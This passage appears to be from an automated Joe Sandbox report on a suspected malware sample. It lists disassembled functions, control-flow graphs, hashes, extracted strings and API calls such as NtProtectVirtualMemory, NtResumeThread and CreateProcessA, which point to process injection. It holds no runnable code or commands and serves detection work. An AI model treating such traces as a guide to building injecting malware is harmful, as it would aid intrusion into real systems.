                                                            • Instruction Fuzzy Hash: 2A222D34A10219CFDF64DFA4D944BADB7B2FF88304F158199E909AB2A4DB709D85CF60
                                                            Function 00B17670 Relevance: 6.0, Strings: 4, Instructions: 983COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 905 b17670-b17691 906 b17693 905->906 907 b17698-b1777f 905->907 906->907 909 b17e81-b17ea9 907->909 910 b17785-b178c6 call b13e78 907->910 913 b185af-b185b8 909->913 956 b17e4a-b17e74 910->956 957 b178cc-b17927 910->957 914 b17eb7-b17ec1 913->914 915 b185be-b185d5 913->915 917 b17ec3 914->917 918 b17ec8-b17fbc call b13e78 914->918 917->918 939 b17fe6 918->939 940 b17fbe-b17fca 918->940 943 b17fec-b1800c 939->943 941 b17fd4-b17fda 940->941 942 b17fcc-b17fd2 940->942 945 b17fe4 941->945 942->945 948 b1806c-b180ec 943->948 949 b1800e-b18067 943->949 945->943 970 b18143-b18186 call b13e78 948->970 971 b180ee-b18141 948->971 960 b185ac 949->960 967 b17e76 956->967 968 b17e7e 956->968 964 b17929 957->964 965 b1792c-b17937 957->965 960->913 964->965 969 b17d5f-b17d65 965->969 967->968 968->909 972 b17d6b-b17de7 call b12eec 969->972 973 b1793c-b1795a 969->973 1000 b18191-b1819a 970->1000 971->1000 1016 b17e34-b17e3a 972->1016 977 b179b1-b179c6 973->977 978 b1795c-b17960 973->978 981 b179c8 977->981 982 b179cd-b179e3 977->982 978->977 979 b17962-b1796d 978->979 983 b179a3-b179a9 979->983 981->982 987 b179e5 982->987 988 b179ea-b17a01 982->988 991 b179ab-b179ac 983->991 992 b1796f-b17973 983->992 987->988 989 b17a03 988->989 990 b17a08-b17a1e 988->990 989->990 996 b17a20 990->996 997 b17a25-b17a2c 990->997 999 b17a2f-b17a9a 991->999 994 b17975 992->994 995 b17979-b17991 992->995 994->995 1001 b17993 995->1001 1002 b17998-b179a0 995->1002 996->997 997->999 1003 b17a9c-b17aa8 999->1003 1004 b17aae-b17c63 999->1004 1006 b181fa-b18209 1000->1006 1001->1002 1002->983 1003->1004 1014 b17c65-b17c69 1004->1014 1015 b17cc7-b17cdc 1004->1015 1007 b1820b-b18293 1006->1007 1008 b1819c-b181c4 1006->1008 1044 b1840c-b18418 1007->1044 1011 b181c6 1008->1011 1012 b181cb-b181f4 1008->1012 1011->1012 1012->1006 1014->1015 1022 b17c6b-b17c7a 1014->1022 1020 b17ce3-b17d04 1015->1020 1021 b17cde 1015->1021 1018 b17de9-b17e31 1016->1018 1019 b17e3c-b17e42 1016->1019 1018->1016 1019->956 1023 b17d06 1020->1023 1024 b17d0b-b17d2a 1020->1024 1021->1020 1026 b17cb9-b17cbf 1022->1026 1023->1024 1030 b17d31-b17d51 1024->1030 1031 b17d2c 1024->1031 1028 b17cc1-b17cc2 1026->1028 1029 b17c7c-b17c80 1026->1029 1033 b17d5c 1028->1033 1035 b17c82-b17c86 1029->1035 1036 b17c8a-b17cab 1029->1036 1037 b17d53 1030->1037 1038 b17d58 1030->1038 1031->1030 1033->969 1035->1036 1039 b17cb2-b17cb6 1036->1039 1040 b17cad 1036->1040 1037->1038 1038->1033 1039->1026 1040->1039 1045 b18298-b182a1 1044->1045 1046 b1841e-b18479 1044->1046 1047 b182a3 1045->1047 1048 b182aa-b18400 1045->1048 1061 b184b0-b184da 1046->1061 1062 b1847b-b184ae 1046->1062 1047->1048 1049 b182b0-b182f0 1047->1049 1050 b182f5-b18335 1047->1050 1051 b1833a-b1837a 1047->1051 1052 b1837f-b183bf 1047->1052 1066 b18406 1048->1066 1049->1066 1050->1066 1051->1066 1052->1066 1070 b184e3-b18576 1061->1070 1062->1070 1066->1044 1074 b1857d-b1859d 1070->1074 1074->960
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2265854423.0000000000B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b10000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: TJq$Teq$pq$xbq
                                                            • API String ID: 0-2466396065
                                                            • Opcode ID: 31127e944f64565b807f3c2fb47cc9e4771ed769396d2b8ab9c108dce5b816b7
                                                            • Instruction ID: abbebb7e3268fbee19402c6c94cc9489c4fdde718625cb4c101a3a7fdfb20b85
                                                            • Opcode Fuzzy Hash: 31127e944f64565b807f3c2fb47cc9e4771ed769396d2b8ab9c108dce5b816b7
                                                            • Instruction Fuzzy Hash: 82A2B775A00628CFDB64CF69C984AD9BBB2FF89304F1581E9D509AB365DB319E81CF40
                                                            Function 064278F8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66nativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06427989
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2281242669.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6420000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID: MemoryProtectVirtual
                                                            • String ID: Vv'
                                                            • API String ID: 2706961497-517628335
                                                            • Opcode ID: c100a62c436956e04f45cbf9c8e87ba6d112e54e3908a405accb2c2cffa5f542
                                                            • Instruction ID: de14e464df0ce2c09f06d1a33ba6f1d6da491bcf7731dd2eb33980ba629ba6e8
                                                            • Opcode Fuzzy Hash: c100a62c436956e04f45cbf9c8e87ba6d112e54e3908a405accb2c2cffa5f542
                                                            • Instruction Fuzzy Hash: 062115B1D003099FDB10DFAAD984ADEFBF5FF48310F60842AE919A7250C7359901CBA4
                                                            Function 06427900 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63nativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06427989
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2281242669.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6420000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID: MemoryProtectVirtual
                                                            • String ID: Vv'
                                                            • API String ID: 2706961497-517628335
                                                            • Opcode ID: 14fbce0d761af1933c8ff40b79b7821e11554f8861913df49dfe94f87638e2b8
                                                            • Instruction ID: 498fcec5e41e88e800c577e461affd2dabe62ff48407c403f4fd1a48b11e9235
                                                            • Opcode Fuzzy Hash: 14fbce0d761af1933c8ff40b79b7821e11554f8861913df49dfe94f87638e2b8
                                                            • Instruction Fuzzy Hash: FC2100B1D013099FDB10DFAAD980ADEFBF5FF48310F60842AE919A7240C775A901CBA4
                                                            Function 0642B1E0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60nativethreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtResumeThread.NTDLL(?,?), ref: 0642B256
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2281242669.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6420000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID: Vv'
                                                            • API String ID: 947044025-517628335
                                                            • Opcode ID: eb3ee9be8624b70f804afd81774975bb38077a977969f401243346fdecc7e7e7
                                                            • Instruction ID: dff7420c4d5de98983e2b576db2cd0a8540f9fae5a44c7a872023f9167c97792
                                                            • Opcode Fuzzy Hash: eb3ee9be8624b70f804afd81774975bb38077a977969f401243346fdecc7e7e7
                                                            • Instruction Fuzzy Hash: 2B1115B0D003099FDB20DFAAC885BDEFBF4EB48210F50842AD429A7240CB759905CFA4
                                                            Function 0642B1E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54nativethreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtResumeThread.NTDLL(?,?), ref: 0642B256
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2281242669.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6420000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID: Vv'
                                                            • API String ID: 947044025-517628335
                                                            • Opcode ID: 5c8d9d1cdb4c31b079379551779424343974db5914634ea6213b78bbb25f9dee
                                                            • Instruction ID: 7b7b1dbe4b5b570bf8c9f6ef822a05273ba9f191fdf7af4c9578907363f2d827
                                                            • Opcode Fuzzy Hash: 5c8d9d1cdb4c31b079379551779424343974db5914634ea6213b78bbb25f9dee
                                                            • Instruction Fuzzy Hash: 811103B1D003098FDB24DFAAC484B9EFBF4EB48220F50842AD419A7240CB79A905CFA4
                                                            Function 06424588 Relevance: 3.1, Strings: 2, Instructions: 610COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2281242669.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6420000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: fq$8
                                                            • API String ID: 0-1651916650
                                                            • Opcode ID: 41fb724e705598c62a984c42c633269cbe91f6a804941ee6a37af2987a256a2e
                                                            • Instruction ID: 9348c512ecbce6668cd06951e2d81b93ce3eb7802da778f0e9a4d50273e5ce06
                                                            • Opcode Fuzzy Hash: 41fb724e705598c62a984c42c633269cbe91f6a804941ee6a37af2987a256a2e
                                                            • Instruction Fuzzy Hash: 2C52E875D016298FDB68DF68C890BD9B7B1FB89300F5082AAD509A7355DB30AE85CF90
                                                            Function 06424545 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2281242669.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6420000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: fq$h
                                                            • API String ID: 0-152923806
                                                            • Opcode ID: 5914190852aba1ca5c48d89afed46090e2d8039590a677d90e166b765c56be3f
                                                            • Instruction ID: ecb982c658efb8ec328fa770120271bf26984fb0861c6b093125645e3e145f9e
                                                            • Opcode Fuzzy Hash: 5914190852aba1ca5c48d89afed46090e2d8039590a677d90e166b765c56be3f
                                                            • Instruction Fuzzy Hash: 32812775D012298FEB65DF69C850BDABBB2FF89300F1082EAD509A7254DB305E85CF90
                                                            Function 0642457A Relevance: 2.7, Strings: 2, Instructions: 170COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2281242669.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6420000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: fq$h
                                                            • API String ID: 0-152923806
                                                            • Opcode ID: 035b10757b7332ebd186a7af2085f8e4e32a557c68056148bfa9e285d263ca3a
                                                            • Instruction ID: 9b3b5411edabb10634edcf720bfd92f57881d125772135385b983efbe598a67a
                                                            • Opcode Fuzzy Hash: 035b10757b7332ebd186a7af2085f8e4e32a557c68056148bfa9e285d263ca3a
                                                            • Instruction Fuzzy Hash: 10711875D016298FEB64DF69C850BDAFBB2FF89300F5082AAD509A7254DB305E85CF90
                                                            Function 00B197F0 Relevance: 2.6, Strings: 1, Instructions: 1338COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2265854423.0000000000B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b10000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $q
                                                            • API String ID: 0-1301096350
                                                            • Opcode ID: 672c975f44e191721d5b347da81f260bfd504241913a4093f53f3723c23fbc34
                                                            • Instruction ID: 59fe4fe5b7a61be36ef81b6f5ef5e568c0e41b1021ca2f8597928465aad10a9c
                                                            • Opcode Fuzzy Hash: 672c975f44e191721d5b347da81f260bfd504241913a4093f53f3723c23fbc34
                                                            • Instruction Fuzzy Hash: 4FE2B274E012288FDB68DF68D894B9ABBF1FB89305F1081E9E509A7355DB306E85CF41
                                                            Function 06299AE0 Relevance: 1.6, Strings: 1, Instructions: 373COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2280341788.0000000006290000.00000040.00000800.00020000.00000000.sdmp, Offset: 06290000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6290000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Teq
                                                            • API String ID: 0-1098410595
                                                            • Opcode ID: cbd1f71ac01b590384098ac3cd1eb20f1722f9b4c0ed2343ce5b8579754fcd55
                                                            • Instruction ID: 79f7d48e2cfd9e6b457084918808e9b4548cb1184c61777f05a6e5e37b81ff9e
                                                            • Opcode Fuzzy Hash: cbd1f71ac01b590384098ac3cd1eb20f1722f9b4c0ed2343ce5b8579754fcd55
                                                            • Instruction Fuzzy Hash: 05F15674E15218CFEBA4DF69D880B99B7F2BB8A300F1480AAD90DA7354DB705D85CF61
                                                            Function 06299ADF Relevance: 1.6, Strings: 1, Instructions: 360COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2280341788.0000000006290000.00000040.00000800.00020000.00000000.sdmp, Offset: 06290000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6290000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Teq
                                                            • API String ID: 0-1098410595
                                                            • Opcode ID: 127a33fc4d059d5e1c84dacb1f4de4efb6d4af8bfe96c67602b4d9836b8d6e78
                                                            • Instruction ID: 6a429aa218a795c91ffeb270555cb24d2d8c1cb8b3e77b3ecc81692399bd2435
                                                            • Opcode Fuzzy Hash: 127a33fc4d059d5e1c84dacb1f4de4efb6d4af8bfe96c67602b4d9836b8d6e78
                                                            • Instruction Fuzzy Hash: 0AF14874E15218CFEBA4DF69D880B99B7F2BB8A300F1480AAD90DA3354DB705D85CF61
                                                            Function 0629A1B1 Relevance: 1.6, Strings: 1, Instructions: 339COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2280341788.0000000006290000.00000040.00000800.00020000.00000000.sdmp, Offset: 06290000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6290000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Teq
                                                            • API String ID: 0-1098410595
                                                            • Opcode ID: e02988ba6efc53885901226b379d35ca20a07a47a7806152e1ca13ceda3855cf
                                                            • Instruction ID: b92422e05f8175d9c49f3adc3250617442d292c8fcd8416c823869b1eef20245
                                                            • Opcode Fuzzy Hash: e02988ba6efc53885901226b379d35ca20a07a47a7806152e1ca13ceda3855cf
                                                            • Instruction Fuzzy Hash: 95F15774E15218CFEBA4DF68D884B9DB7B2FB8A300F1480AAD909A3355DB705D85CF61
                                                            Function 062F0448 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2280548564.00000000062F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_62f0000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Dq
                                                            • API String ID: 0-144822681
                                                            • Opcode ID: 15e4724c3123c694e175065dc09fa188c0b7da3209f0a2d1f7888b9d1acab100
                                                            • Instruction ID: 5796012ae408a724786ac1c13ad29a45006ec869fb2114849bbef90ea269f807
                                                            • Opcode Fuzzy Hash: 15e4724c3123c694e175065dc09fa188c0b7da3209f0a2d1f7888b9d1acab100
                                                            • Instruction Fuzzy Hash: 52D1A474E10218CFDB58DFA9D990B9DBBB2BF89300F1081A9D509AB365DB31AD85CF50
                                                            Function 0629790D Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2280341788.0000000006290000.00000040.00000800.00020000.00000000.sdmp, Offset: 06290000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6290000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Teq
                                                            • API String ID: 0-1098410595
                                                            • Opcode ID: f1750486c16edac7c9de311bfa4c9521dbdae1b9e90a00c6baa3d38f85fb060f
                                                            • Instruction ID: 98519e16b4016043391f213d31c7000fe19421c03075163a9f0047da3c9a1382
                                                            • Opcode Fuzzy Hash: f1750486c16edac7c9de311bfa4c9521dbdae1b9e90a00c6baa3d38f85fb060f
                                                            • Instruction Fuzzy Hash: AFB14974D21248CFEB54DFA9D884B9DBBF2FB89304F209069D809A7355DB709945CF50
                                                            Function 06297938 Relevance: 1.5, Strings: 1, Instructions: 253COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2280341788.0000000006290000.00000040.00000800.00020000.00000000.sdmp, Offset: 06290000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6290000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Teq
                                                            • API String ID: 0-1098410595
                                                            • Opcode ID: b6b072c12bd53b286cb00b2fbd80f59552c5eca2353e22c2872fa468fa8f1f55
                                                            • Instruction ID: 4db546a5572804336e4292902fbfe62250adbbe6660d72378e57339e5c0a8fbb
                                                            • Opcode Fuzzy Hash: b6b072c12bd53b286cb00b2fbd80f59552c5eca2353e22c2872fa468fa8f1f55
                                                            • Instruction Fuzzy Hash: 52B14674D21208CFEB58DFA9D884BADBBF2FB89304F209069D809A7355DB709985CF50
                                                            Function 062F0438 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2280548564.00000000062F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_62f0000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Dq
                                                            • API String ID: 0-144822681
                                                            • Opcode ID: 2ce06f393e015b8b53a5b266287a4e863fa69274d2c43b658595d586d8614fc0
                                                            • Instruction ID: 8790ad04f51307485fbac52cc45ef57d4b72fdff41c71d6aef7e262d50965fe6
                                                            • Opcode Fuzzy Hash: 2ce06f393e015b8b53a5b266287a4e863fa69274d2c43b658595d586d8614fc0
                                                            • Instruction Fuzzy Hash: 05A1AF74E102188FDB58DF69D994B9DBBF2BF89300F1081A9D909AB365DB30AD85CF50
                                                            Function 00B1B163 Relevance: .5, Instructions: 539COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2265854423.0000000000B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b10000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1482e72dd421a81f49bcea5b359b9d066f369aa388f66b4755925dcd069edfc3
                                                            • Instruction ID: 208c4f5f51a5df83299cccfd81b6445d3734bc0271c33ac4f1d8c4e900f77d51
                                                            • Opcode Fuzzy Hash: 1482e72dd421a81f49bcea5b359b9d066f369aa388f66b4755925dcd069edfc3
                                                            • Instruction Fuzzy Hash: 5F52B274A006288FDB64DF28C984B9ABBF2FB49301F1091D9E90DA7355DB30AE85DF51
                                                            Function 0631EFA0 Relevance: .3, Instructions: 270COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2280640023.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6310000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eccfca62cd1d72512193044fcb8bf67eef5f9617bfed71bbd637467d41f2407e
                                                            • Instruction ID: 27d2c16835c86dce300daadf892f1275eb1907aa12b1c5c0d3eee49f4273174d
                                                            • Opcode Fuzzy Hash: eccfca62cd1d72512193044fcb8bf67eef5f9617bfed71bbd637467d41f2407e
                                                            • Instruction Fuzzy Hash: 83C11774E05218CFEB98DF68D844B9DBBF6FB89304F109069D819AB355DB30598ACF81
                                                            Function 06296530 Relevance: .3, Instructions: 251COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2280341788.0000000006290000.00000040.00000800.00020000.00000000.sdmp, Offset: 06290000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6290000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 443b366066e07be1fa4a68aadc4ff476df8c3666e86c8a0d507e1c2e753bfbf2
                                                            • Instruction ID: f9760cbd48c53a7917a48596b2bd369bc75586f0f0a58b832b10c6561d311d42
                                                            • Opcode Fuzzy Hash: 443b366066e07be1fa4a68aadc4ff476df8c3666e86c8a0d507e1c2e753bfbf2
                                                            • Instruction Fuzzy Hash: B6C12874E21208CFEBA4CF65D884B9DBBF2FB8A304F1090A9D949A7255C7749989CF50
                                                            Function 06296495 Relevance: .2, Instructions: 247COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2280341788.0000000006290000.00000040.00000800.00020000.00000000.sdmp, Offset: 06290000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6290000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 369bb47e6e49ac19cf6e894bc55e66b72ff7d2bd5f4c7945a66ab6f6c52fbcc7
                                                            • Instruction ID: 949aab6d5706810756632b5e3519689efc56e472c5b2fd0fac7cf02c73a21450
                                                            • Opcode Fuzzy Hash: 369bb47e6e49ac19cf6e894bc55e66b72ff7d2bd5f4c7945a66ab6f6c52fbcc7
                                                            • Instruction Fuzzy Hash: FDC13874E25218CFEFA4CF65D884B9DBBF2FB8A304F1080A9D948A7251D7749989CF50
                                                            Function 0631452B Relevance: .2, Instructions: 231COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2280640023.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6310000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f3f6099a8c42e1dde38004b5a4cd56b5ae3f761bda412e3ce10ec576db7dd380
                                                            • Instruction ID: 5a4f03330a3f35ce83451aed652f18ab548bb24427b6d67cb472f5c4037f9a5a
                                                            • Opcode Fuzzy Hash: f3f6099a8c42e1dde38004b5a4cd56b5ae3f761bda412e3ce10ec576db7dd380
                                                            • Instruction Fuzzy Hash: 99916874E05208CFEB58DFA9D444BADBBF6FB4A304F109069D119AB352DB30994ACF81
                                                            Function 065EFB98 Relevance: .2, Instructions: 156COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2281378339.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_65d0000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 82ac02ef52940b3b31954c6106e4f9b9d887bc7340a38d4507c55c56330a9dfc
                                                            • Instruction ID: 7fd6f8c07c62edd6fdb97a88f3441ae45c2c651c2e5ce42e6ca7feb67446ae53
                                                            • Opcode Fuzzy Hash: 82ac02ef52940b3b31954c6106e4f9b9d887bc7340a38d4507c55c56330a9dfc
                                                            • Instruction Fuzzy Hash: E3513AB4E14219DFDB48CF98D585AAEBBF6FB89300F248025D519E7344CB34A986CB91
                                                            Function 06111830 Relevance: 7.7, Strings: 6, Instructions: 155COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 860 6111830-611187c 864 6111882-6111894 860->864 865 61119fa-6111a29 860->865 868 61118e4-611192d 864->868 869 6111896-61118e2 864->869 877 6111a52 865->877 878 6111a2b-6111a36 865->878 887 6111930-6111970 868->887 869->887 878->877 892 6111972-6111978 887->892 893 611197a-6111984 887->893 894 6111987-61119ca 892->894 893->894 901 61119f0-61119f7 894->901 902 61119cc-61119e8 894->902 902->901
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2279675295.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6110000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (q$4'q$4'q$4'q$4'q$pq
                                                            • API String ID: 0-2944075406
                                                            • Opcode ID: 73dc6caaa7bd67cab2667d87e4043e6663cf08f1f4a140f3da4bcc73dedd5e47
                                                            • Instruction ID: b1e81f3f8b1292dd8c87e147dc3bc55f5898fd837cad8dd009227849ff09085e
                                                            • Opcode Fuzzy Hash: 73dc6caaa7bd67cab2667d87e4043e6663cf08f1f4a140f3da4bcc73dedd5e47
                                                            • Instruction Fuzzy Hash: 5551E530E003059FD754EB7998517AFBBA2BFC9300F14842CD54A9B295DB34A90687E1
                                                            Function 064286F4 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 204processCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1076 64286f4-6428770 1079 6428772-642877c 1076->1079 1080 64287a9-64287c9 1076->1080 1079->1080 1081 642877e-6428780 1079->1081 1085 6428802-642883c 1080->1085 1086 64287cb-64287d5 1080->1086 1083 6428782-642878c 1081->1083 1084 64287a3-64287a6 1081->1084 1087 6428790-642879f 1083->1087 1088 642878e 1083->1088 1084->1080 1096 6428875-64288ea CreateProcessA 1085->1096 1097 642883e-6428848 1085->1097 1086->1085 1089 64287d7-64287d9 1086->1089 1087->1087 1090 64287a1 1087->1090 1088->1087 1091 64287db-64287e5 1089->1091 1092 64287fc-64287ff 1089->1092 1090->1084 1094 64287e7 1091->1094 1095 64287e9-64287f8 1091->1095 1092->1085 1094->1095 1095->1095 1098 64287fa 1095->1098 1107 64288f3-642893b 1096->1107 1108 64288ec-64288f2 1096->1108 1097->1096 1099 642884a-642884c 1097->1099 1098->1092 1101 642884e-6428858 1099->1101 1102 642886f-6428872 1099->1102 1103 642885a 1101->1103 1104 642885c-642886b 1101->1104 1102->1096 1103->1104 1104->1104 1105 642886d 1104->1105 1105->1102 1113 642894b-642894f 1107->1113 1114 642893d-6428941 1107->1114 1108->1107 1116 6428951-6428955 1113->1116 1117 642895f-6428963 1113->1117 1114->1113 1115 6428943 1114->1115 1115->1113 1116->1117 1118 6428957 1116->1118 1119 6428973 1117->1119 1120 6428965-6428969 1117->1120 1118->1117 1122 6428974 1119->1122 1120->1119 1121 642896b 1120->1121 1121->1119 1122->1122
                                                            APIs
                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 064288DA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2281242669.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6420000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID: Vv'$Vv'
                                                            • API String ID: 963392458-3897546610
                                                            • Opcode ID: c0ff4316accb4a44ad7a7381e8531c3c935311667e70b7111e5bcc7ffb92eac1
                                                            • Instruction ID: 32eba72ae3e8221d594844468b8e12a90433f0ba3d1daeb72840d18fb7dc3a91
                                                            • Opcode Fuzzy Hash: c0ff4316accb4a44ad7a7381e8531c3c935311667e70b7111e5bcc7ffb92eac1
                                                            • Instruction Fuzzy Hash: 57814771D0021A9FDB51DFA9C9817EEBBF2BF48310F64852AE858A7344DB748895CB81
                                                            Function 06428700 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 201processCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
